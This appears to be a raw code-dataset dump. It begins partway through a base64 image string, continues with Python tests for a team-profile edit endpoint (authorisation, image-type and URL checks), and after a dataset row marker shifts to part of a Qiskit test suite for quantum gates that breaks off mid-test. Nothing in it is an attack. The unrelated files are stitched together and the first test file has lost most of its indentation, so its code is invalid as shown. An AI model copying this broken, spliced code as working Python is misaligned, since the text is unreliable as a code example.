GKFwpKjgnHAptO3ttK7jtJzjPFADaUEg5BwaSigBSSeT1pKKKACuq8DeFJ/EusKSrLZQENNLj9B7
1D4P8I3finUxGgMdpGczTdlHoPevfLOwtdC0yKx06ARxR8Djlj3J9TTEzasV2QcnheAPQelW7Wcx
CRuMMuG6dKoGUJbA4xxyW4qF7oPbGKCWOSTHCK3NHqOw64ud8uOAhPpVSa5KyyTINxjARB/tt3/K
miR45RDdxGN/4lPOKxL28t/tzI920TBsR28bYJ9yaq6EbyMII1QDgfrXMyzf2jqVxdMfkBMMPso+
+fqQCPxrpJZ4Fsd6Bw5i3DLZ7Vx2nSL9hjBOMoSfxYZq6S55WIqPljc3NL08Tycrhn6j0HYCutg0
SEJyvas3w5s/vJ1/hNdzBbboQcV7OIquhanHRI+UdOeLqybOH1LQkCbowOPWuSurMAshUsPTHJ9y
a9T1CMKpVq8/1rKysFxtbsTiu3A4mU9GcsqcqM7HlXiDThbXDABdrDnb0rhriPypnT0NeneJVAjD
Z/ALgVwmo2qvEZ1wGHUetebm9BU6l49T6jL6rnT1MeinhSI9wcDnG3PNMrxT0Qoop6puRm3KNvYn
k/SgBlFFFABRRRQAUUUUAPjQOSC6rgZy1Mopy7c/NnHtQA2iiigAooooAKKKKACnyCMOfLLFexYY
NIUZQCRweRTaACinEJsBDEtnkYptABT2QBAwYcnGM8imUUAFFFFABSjHOaSigAooooAKUMQCATg9
aUOyqyg8N1ptACgZOKV1KMVOOPQ5ptFABRRRQA5mZySeTTaKKACipJJA4X92i7VA+Udfc+9R0AFK
CQcg4NJRQAUUUUAKAMHmkopdpxkDj1oASpbeF7i4ihj+/I4RfqTimKAQSWwR0HrW14PRpPFumKmM
+eDyM9OaAPoPw/o8Ph/w9bWNsgBC7pGx95iOSadNNI0n7snI9sk1M8pOTuAyKoNKVkzuosJEtzDP
MvITOfvzNvP5DirEfn2MP2gTLKFxmJI1RTVbzt2Oc+gp0k48kRPHIQ4xlRkU7DuY+u+IHlllvLlV
ikb+ANnHpXAm9RtRa5jUuzNnJPOa7ebTbB5mFxEZDn+I1jaho9gZpEjgEZZP3e0/xCrWisS2dHb6
tYvp8ERkaWfywHWMZ2/U1zNrOYHMDHays0Z+vUfyq7YTRWmnRJE25AvPY571ia0wS6a5Q7UkA3Ad
j2NXT92VyZrmjY7rR9SVJFUFg3+0etei2Gt5tVUkHA/GvAdN1tCwVztkXnNdbaeImRAGfk9/WvpK
mGhjaaqQPn4SlhKjutz0DUL8OCc5rjtTuh5pIOT7Niqk/iESIQpx3ODz71z2oayqxsCwYH16H6el
b4XBunrLY4q0nVnojJ8U3QkPllnyD0YCuK1CdEg24y56Vpale/aJWbJ2j1NcxcymaZmzx2rxc1xM
alS0eh9DgKLp07MYg3Pt3hQe5pmMUUV456ApBHUEUlOZ2fG5icDAz6U2gAooooAKKcjBXVmQOAeV
PekYgsSBgE8D0oASinRv5bhtqtjswyKaaACiiigAooooAKKPpRQAU47dowTnvxTaKACiiigB5jdV
VijBW6Ejg0zpU8t5cTQRQSTO0UIIjQtkLk5OKgoAKKKcz7kVdqjbnkDk/WgBtSxw+ZHI++Ndgzhm
wT9PWoqVcFhuJC55IoASilbAY7c47ZpKACiiigAoopQKAEoqV4GDPtZZFUAllPFRYxQAUqkKwJXc
B29aSlABzkgfWgAJBJIGB6UlFFABS8YPNJRQAUUoGQTkcdqSgAooooAlmeN9nlxeXhcN82dx9fao
qUY9KSgAqzYXkmn38F3EfnhcOPwqtRQB75oPiqz1+zE0LbZVH72EnlT6+4q7LcAsTnFeAWN/cadc
rcWshjlU8MPT0+lel6J4th1aAJIRHcgfMh/i9xTQjrmu/KVnLqqjnPpUdvr0PnIhZyHOA3ast75C
mMcYwR61QjWFSoZi2DkdqpWC502oOPMWQdMc1iX1wHjJBKupyGFSy36NFsDZAHc1zeo3RGV38Z4I
piY/+0ljuSX3JGx/eKoyVPciq2pSyRsFYqRIAwwwbjtn3qgWZzuPB71HgduPan1EKFLglWAYdu9S
pqd3bjYzbsHoagYFeacN+DjJ+tdNLE1KTvB2Mp0ozVpK5YbVrg9ABn0qlPcSS8yMcUNIQxQgbh7V
Ru7hYUJzl/rWtXMcRUVpS0M4YWlB3jEgvrjYhUfeasqnSSNK5ZutMrzpSuzrSsFFFFSMVtu47M7e
2aSiigApSckk0lFABRRTlRncKoyx4AoAbSlcAHI5qW6tZ7K4aC4jMcqY3Ke3GaiwcZxxQAlFLu4x
gUlABRRRnNABR26UUUALxgetJRRQAUUpBU89aSgAooooAUjFBbKhcDjvSUUAFKBkgfzoY5PU/jSU
ASyo0ErxEoxU4JU5H4GoqKKACilJJOTRQAEYJGc0lFFABRRRQAoHU9hT5TEX/cqwXH8Ryc1HSlSF
DEcHpQAlFFKSTigBKKKKAHKxQ5U4yMU2iigBTjjAxSUUUAFFFFABRTlUtnBAwM8mm0AFTwSpEzMy
sW2/IVbbtb1qCigDes/E11EAs58wD+LvWoviKKZflUlvrXG96UEg8HFO4rHWjU5mz81R/aGcncxN
c4l5NH0fI9DVuPUx0kj/ABU0XFY2w+AKdvDGsoalBn7zflTxqluOrtn/AHarmCxqYUD5jTJpDjAb
p3B61lPqse7CK7k/hVe7vbtJGidfJYdV7880+YLFy5u0iB3HLHsKx5pmlck/lTGJJyW3H1ptQ2Ow
U4qwAJHB6UhBH40lIYUU8OBGV2jJPXHIplABS5+XGB9aSjHNABk0UpBU4IxSDrQAUU5E3yBNyrk4
yxwBQy7WK5BwcZHQ0ANJzRRRQAUppKKACnIU53gnjjHrTaKACiiigAopQxAI9aApbOATjrigBKKM
migAooooAKKcqMwYqpIUZJA6UmTjFADiylAAmCDy2etOZIxAjLKGkOdybSNv41FQaACiiigAoooo
AKKUjBxUkMQlk25xwT+QoAip8cZlcICoJ9TgUyigAop8bKrgum9R1XOM009eBigCS3gNxOkQdELH
G52wB9TTZYzFK8ZZSVYqSpyDj0NMooAKKKKACiiigBQcEH0oJycmigY54oAO3SkqWR42hjCxBWGd
zAn5qioAKKKfK/mSFtqrnsowKAGUVYS13WMtxvx5bqu3HXOf8Kr0AFFFFACg4pKKKACiiigBaCSe
Scn3pKKACilVipyDg9KSgBSSepzSUUpOaAEooooAKASDxRRQA53aRizsWY9zS7B5W/euc4255+tM
ooABRRUkszzPuc5bGM4xQBHRRRQAUUUUAFFLSUAFFFFABSgkZwSM04hfKBwdxPrTKACiiigAoop8
MfmzJHnG5gM0AIrMoYByAw5APWjYdm/IxnGM80+4i8md4852nGaioAKUcHNJRQAUUUUAFFFFAH//
2Q==""")
class TestTeamEdit(Harness):
def test_edit(self):
self.make_team(slug='enterprise', is_approved=True)
edit_data = {
'name': 'Enterprise',
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
'image': FileUpload(IMAGE, 'logo.png'),
}
data = json.loads(self.client.POST( '/enterprise/edit/edit.json'
, data=edit_data
, auth_as='picard'
).body)
team = T('enterprise')
assert data == team.to_dict()
assert team.name == 'Enterprise'
assert team.product_or_service == 'We save galaxies.'
assert team.homepage == 'http://starwars-enterprise.com/'
assert team.load_image('original') == IMAGE
def test_edit_supports_partial_updates(self):
self.make_team(slug='enterprise', is_approved=True)
edit_data = {
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
'image': FileUpload(IMAGE, 'logo.png'),
}
self.client.POST( '/enterprise/edit/edit.json'
, data=edit_data
, auth_as='picard'
)
team = T('enterprise')
assert team.name == 'The Enterprise'
assert team.product_or_service == 'We save galaxies.'
assert team.homepage == 'http://starwars-enterprise.com/'
assert team.load_image('original') == IMAGE
def test_edit_needs_auth(self):
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
)
assert response.code == 401
assert T('enterprise').name == 'The Enterprise'
def test_only_admin_and_owner_can_edit(self):
self.make_participant('alice', claimed_time='now')
self.make_participant('admin', claimed_time='now', is_admin=True)
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='alice'
)
assert response.code == 403
assert T('enterprise').name == 'The Enterprise'
response = self.client.POST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='admin'
)
assert response.code == 200
assert T('enterprise').name == 'Enterprise'
# test_edit() passes => owner can edit
def test_cant_edit_closed_teams(self):
self.make_team(slug='enterprise', is_approved=True)
self.db.run("UPDATE teams SET is_closed = true WHERE slug = 'enterprise'")
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code in (403, 410)
assert T('enterprise').name == 'The Enterprise'
def test_cant_edit_rejected_teams(self):
self.make_team(slug='enterprise', is_approved=False)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code == 403
assert T('enterprise').name == 'The Enterprise'
def test_can_edit_teams_under_review(self):
self.make_team(slug='enterprise', is_approved=None)
response = self.client.POST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code == 200
assert T('enterprise').name == 'Enterprise'
def test_can_only_edit_allowed_fields(self):
allowed_fields = set(['name', 'image', 'product_or_service', 'homepage'])
team = self.make_team(slug='enterprise', is_approved=None)
fields = vars(team).keys()
fields.remove('onboarding_url') # we are still keeping this in the db for now
for field in fields:
if field not in allowed_fields:
response = self.client.POST( '/enterprise/edit/edit.json'
, data={field: 'foo'}
, auth_as='picard'
)
new_team = T('enterprise')
assert response.code == 200
assert getattr(new_team, field) == getattr(team, field)
def test_edit_accepts_jpeg_and_png(self):
team = self.make_team(slug='enterprise', is_approved=True)
image_types = ['png', 'jpg', 'jpeg']
for i_type in image_types:
team.save_image(original='', large='', small='', image_type='image/png')
data = {'image': FileUpload(IMAGE, 'logo.'+i_type)}
response = self.client.POST( '/enterprise/edit/edit.json'
, data=data
, auth_as='picard'
)
assert response.code == 200
assert team.load_image('original') == IMAGE
def test_edit_with_invalid_image_type_raises_error(self):
team = self.make_team(slug='enterprise', is_approved=True)
invalid_image_types = ['tiff', 'gif', 'bmp', 'svg']
for i_type in invalid_image_types:
data = {'image': FileUpload(IMAGE, 'logo.'+i_type)}
response = self.client.PxST( '/enterprise/edit/edit.json'
, data=data
, auth_as='picard'
)
assert response.code == 400
assert "Please upload a PNG or JPG image." in response.body
            assert team.load_image('original') is None
def test_edit_with_empty_values_raises_error(self):
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': ' '}
, auth_as='picard'
)
assert response.code == 400
assert T('enterprise').name == 'The Enterprise'
def test_edit_with_bad_url_raises_error(self):
self.make_team( slug='enterprise'
, is_approved=True
, homepage='http://starwars-enterprise.com/')
r = self.client.PxST( '/enterprise/edit/edit.json'
, data={'homepage': 'foo'}
, auth_as='picard'
)
assert r.code == 400
assert "Please enter an http[s]:// URL for the 'Homepage' field." in r.body
assert T('enterprise').homepage == 'http://starwars-enterprise.com/'
def test_edit_with_empty_data_does_nothing(self):
team_data = {
'slug': 'enterprise',
'is_approved': True,
'name': 'Enterprise',
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
}
self.make_team(**team_data)
r = self.client.POST( '/enterprise/edit/edit.json'
, data={}
, auth_as='picard'
)
assert r.code == 200
team = T('enterprise')
for field in team_data:
assert getattr(team, field) == team_data[field]
|
py | 1a40c428f1dfddac3f04d86c3db15dd82d3b71d4 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=missing-docstring
import unittest
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.qasm import pi
from qiskit.exceptions import QiskitError
from qiskit.test import QiskitTestCase
class TestStandard1Q(QiskitTestCase):
"""Standard Extension Test. Gates with a single Qubit"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.cr)
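        # Two 3-qubit quantum registers plus a 3-bit classical register, shared by every test in this class.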
def test_barrier(self):
self.circuit.barrier(self.qr[1])
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[1]])
def test_barrier_wires(self):
self.circuit.barrier(1)
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[1]])
def test_barrier_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.barrier, self.cr[0])
self.assertRaises(QiskitError, qc.barrier, self.cr)
self.assertRaises(QiskitError, qc.barrier, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.barrier, .0)
def test_conditional_barrier_invalid(self):
qc = self.circuit
barrier = qc.barrier(self.qr)
self.assertRaises(QiskitError, barrier.c_if, self.cr, 0)
def test_barrier_reg(self):
self.circuit.barrier(self.qr)
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_barrier_none(self):
self.circuit.barrier()
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2],
self.qr2[0], self.qr2[1], self.qr2[2]])
def test_ccx(self):
self.circuit.ccx(self.qr[0], self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ccx')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_ccx_wires(self):
self.circuit.ccx(0, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ccx')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_ccx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ccx, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.ccx, self.qr[0], self.qr[0], self.qr[2])
self.assertRaises(QiskitError, qc.ccx, 0.0, self.qr[0], self.qr[2])
self.assertRaises(QiskitError, qc.ccx, self.cr, self.qr, self.qr)
self.assertRaises(QiskitError, qc.ccx, 'a', self.qr[1], self.qr[2])
def test_ch(self):
self.circuit.ch(self.qr[0], self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ch')
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_ch_wires(self):
self.circuit.ch(0, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ch')
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_ch_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ch, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.ch, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.ch, .0, self.qr[0])
self.assertRaises(QiskitError, qc.ch, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.ch, self.cr, self.qr)
self.assertRaises(QiskitError, qc.ch, 'a', self.qr[1])
def test_crz(self):
self.circuit.crz(1, self.qr[0], self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'crz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_crz_wires(self):
self.circuit.crz(1, 0, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'crz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_crz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.crz, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.crz, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.crz, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.crz, self.qr[2], self.qr[1], self.qr[0])
self.assertRaises(QiskitError, qc.crz, 0, self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.crz, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.crz, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.crz, 'a', self.qr[1], self.qr[2])
def test_cswap(self):
self.circuit.cswap(self.qr[0], self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cswap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_cswap_wires(self):
self.circuit.cswap(0, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cswap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_cswap_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cswap, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cswap, self.qr[1], self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.qr[1], .0, self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.cr[0], self.cr[1], self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.qr[0], self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, .0, self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, (self.qr, 3), self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, self.cr, self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, 'a', self.qr[1], self.qr[2])
def test_cu1(self):
self.circuit.cu1(1, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu1_wires(self):
self.circuit.cu1(1, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu1_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cu1, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu1, 1, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, self.qr[1], 0, self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.cu1, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cu1, self.qr[2], self.qr[1], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu1, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.cu1, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.cu1, 'a', self.qr[1], self.qr[2])
def test_cu3(self):
self.circuit.cu3(1, 2, 3, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu3_wires(self):
self.circuit.cu3(1, 2, 3, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu3_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cu3, 0, 0, self.qr[0], self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, self.qr[1], 0, self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.cu3, 0, 0, 'a', self.qr[1], self.qr[2])
def test_cx(self):
self.circuit.cx(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cx')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cx_wires(self):
self.circuit.cx(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cx')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cx, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cx, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cx, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cx, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cx, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cx, 'a', self.qr[1])
def test_cy(self):
self.circuit.cy(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cy')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cy_wires(self):
self.circuit.cy(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cy')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cy_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cy, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cy, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cy, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cy, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cy, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cy, 'a', self.qr[1])
def test_cz(self):
self.circuit.cz(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cz')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cz_wires(self):
self.circuit.cz(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cz')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cz, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cz, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cz, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cz, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cz, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cz, 'a', self.qr[1])
def test_h(self):
self.circuit.h(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'h')
self.assertEqual(qargs, [self.qr[1]])
def test_h_wires(self):
self.circuit.h(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'h')
self.assertEqual(qargs, [self.qr[1]])
def test_h_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.h, self.cr[0])
self.assertRaises(QiskitError, qc.h, self.cr)
self.assertRaises(QiskitError, qc.h, (self.qr, 3))
self.assertRaises(QiskitError, qc.h, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.h, .0)
def test_h_reg(self):
instruction_set = self.circuit.h(self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'h')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_h_reg_inv(self):
instruction_set = self.circuit.h(self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'h')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_iden(self):
self.circuit.iden(self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'id')
self.assertEqual(op.params, [])
def test_iden_wires(self):
self.circuit.iden(1)
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'id')
self.assertEqual(op.params, [])
def test_iden_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.iden, self.cr[0])
self.assertRaises(QiskitError, qc.iden, self.cr)
self.assertRaises(QiskitError, qc.iden, (self.qr, 3))
self.assertRaises(QiskitError, qc.iden, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.iden, .0)
def test_iden_reg(self):
instruction_set = self.circuit.iden(self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'id')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_iden_reg_inv(self):
instruction_set = self.circuit.iden(self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'id')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_rx(self):
self.circuit.rx(1, self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [1])
def test_rx_wires(self):
self.circuit.rx(1, 1)
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [1])
def test_rx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rx, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.rx, self.qr[1], 0)
self.assertRaises(QiskitError, qc.rx, 0, self.cr[0])
self.assertRaises(QiskitError, qc.rx, 0, .0)
self.assertRaises(QiskitError, qc.rx, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.rx, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.rx, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.rx, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.rx, 0, 'a')
def test_rx_reg(self):
instruction_set = self.circuit.rx(1, self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'rx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_rx_reg_inv(self):
instruction_set = self.circuit.rx(1, self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'rx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_rx_pi(self):
qc = self.circuit
qc.rx(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_ry(self):
self.circuit.ry(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_ry_wires(self):
self.circuit.ry(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_ry_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ry, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.ry, self.qr[1], 0)
self.assertRaises(QiskitError, qc.ry, 0, self.cr[0])
self.assertRaises(QiskitError, qc.ry, 0, .0)
self.assertRaises(QiskitError, qc.ry, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.ry, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.ry, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.ry, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.ry, 0, 'a')
def test_ry_reg(self):
instruction_set = self.circuit.ry(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'ry')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_ry_reg_inv(self):
instruction_set = self.circuit.ry(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ry')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_ry_pi(self):
qc = self.circuit
qc.ry(pi / 2, self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [pi / 2])
def test_rz(self):
self.circuit.rz(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_rz_wires(self):
self.circuit.rz(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_rz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rz, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.rz, self.qr[1], 0)
self.assertRaises(QiskitError, qc.rz, 0, self.cr[0])
self.assertRaises(QiskitError, qc.rz, 0, .0)
self.assertRaises(QiskitError, qc.rz, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.rz, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.rz, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.rz, 'a', self.qr[1])
